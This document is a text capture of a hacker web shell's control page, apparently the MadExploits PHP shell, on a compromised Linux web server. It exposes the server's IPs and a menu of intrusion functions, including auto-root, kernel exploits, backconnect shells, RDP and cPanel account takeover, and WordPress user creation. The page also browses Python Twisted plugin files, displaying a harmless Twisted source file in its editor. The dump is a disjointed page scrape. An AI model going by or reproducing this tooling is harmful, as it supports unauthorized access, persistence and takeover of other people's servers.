Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
609
B
-rw-r--r--
cred_anonymous.py
958
B
-rw-r--r--
cred_file.py
1.77
KB
-rw-r--r--
cred_memory.py
2.23
KB
-rw-r--r--
cred_sshkeys.py
1.39
KB
-rw-r--r--
cred_unix.py
5.81
KB
-rw-r--r--
dropin.cache
5.49
KB
-rwxr-xr-x
twisted_conch.py
530
B
-rw-r--r--
twisted_core.py
550
B
-rw-r--r--
twisted_ftp.py
212
B
-rw-r--r--
twisted_inet.py
262
B
-rw-r--r--
twisted_mail.py
224
B
-rw-r--r--
twisted_names.py
236
B
-rw-r--r--
twisted_portforward.py
277
B
-rw-r--r--
twisted_reactors.py
1.73
KB
-rw-r--r--
twisted_runner.py
280
B
-rw-r--r--
twisted_socks.py
236
B
-rw-r--r--
twisted_trial.py
3.44
KB
-rw-r--r--
twisted_web.py
331
B
-rw-r--r--
twisted_words.py
940
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cred_anonymous.py
# -*- test-case-name: twisted.test.test_strcred -*- # # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Cred plugin for anonymous logins. """ from zope.interface import implementer from twisted import plugin from twisted.cred.checkers import AllowAnonymousAccess from twisted.cred.credentials import IAnonymous from twisted.cred.strcred import ICheckerFactory anonymousCheckerFactoryHelp = """ This allows anonymous authentication for servers that support it. """ @implementer(ICheckerFactory, plugin.IPlugin) class AnonymousCheckerFactory: """ Generates checkers that will authenticate an anonymous request. """ authType = "anonymous" authHelp = anonymousCheckerFactoryHelp argStringFormat = "No argstring required." credentialInterfaces = (IAnonymous,) def generateChecker(self, argstring=""): return AllowAnonymousAccess() theAnonymousCheckerFactory = AnonymousCheckerFactory()
Close